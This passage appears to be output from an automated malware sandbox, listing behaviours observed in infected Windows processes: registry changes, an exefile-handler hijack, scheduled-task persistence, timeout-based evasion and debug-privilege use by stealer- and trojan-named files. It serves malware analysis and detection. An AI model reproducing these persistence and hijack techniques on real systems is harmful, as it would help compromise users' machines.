Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\322341857.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svchost.com N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 4893cd9e8c781441d2a92a7b5f9b3a11bcd37e7e8b8558b059dd60b2da38f1eabdd7394eaa42eb3d1544382cfd1289e9db5f55de50061d9d0541e26e5bf6c9db8fb7162a0fcbb7c53daeac C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
N/A N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3582-490\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\winn.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2946613613.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
